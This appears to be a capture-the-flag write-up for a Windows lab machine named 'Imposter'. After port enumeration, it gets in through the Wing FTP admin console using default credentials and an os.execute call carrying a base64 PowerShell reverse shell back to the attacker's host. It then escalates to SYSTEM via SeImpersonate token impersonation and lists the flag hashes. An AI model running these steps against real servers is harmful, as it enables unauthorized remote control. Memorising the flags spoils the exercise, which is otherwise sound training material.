Info

  • Name – Imposter
  • IP Address – 172.31.1.20

Enumeration

Open Ports

PortsProtocolServiceVersion
123udpfilteredntp
135tcpmsrpcMicrosoft Windows RPC
137udpnetbios-nsMicrosoft Windows netbios-ns
138udpfilterednetbios-dgm
139tcpnetbios-ssnMicrosoft Windows netbios-ssn
162udpfilteredsnmptrap
445tcpmicrosoft-dsMicrosoft Windows Server 2008 R2 – 2012 microsoft-ds
445udpfilteredmicrosoft-ds
500udpfilteredisakmp
514udpfilteredsyslog
520udpfilteredroute
631udpfilteredipp
1025tcpmsrpcMicrosoft Windows RPC
1026tcpmsrpcMicrosoft Windows RPC
1027tcpmsrpcMicrosoft Windows RPC
1028tcpmsrpcMicrosoft Windows RPC
1029tcpmsrpcMicrosoft Windows RPC
1036tcpmsrpcMicrosoft Windows RPC
1037tcpmsrpcMicrosoft Windows RPC
1434udpfilteredms-sql-m
4500udpfilterednat-t-ike
5985tcphttpMicrosoft HTTPAPI httpd 2.0
8080tcphttp-proxyWing FTP Server(UNREGISTERED)
47001tcphttpMicrosoft HTTPAPI httpd 2.0
49152udpfilteredunknown

Exploitation

Exploit Details (SearchSploit)

Generate a PowerShell reverse shell payload that is base64 encoded.

python mkpsrevshell.py 10.10.0.15 443

Log into the admin portal of Wing FTP (admin / password) and navigate to Administration > Console. Type in the command below and intercept the request with burp suite.

os.execute('whoami')

Replace the payload with the base64 encoded reverse shell and send.

Catch the reverse shell and read the access.txt file. 

whoami
type C:\Users\lian\Desktop\access.txt

Privilege Escalation

Exploit Details (SeImpersonate Privilege)

  • Name – SeImpersonate Privilege
  • CVE – N/A
  • Module – N/A
  • Disclosed – N/A
  • References
    • N/A
run
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
shell
whoami
type C:\Users\Administrator\Desktop\system.txt

Loot

access.txt - cad14501e31203841c87fe62f4033605
system.txt - 0fae2c56cb5999b9ca977984e7e4646c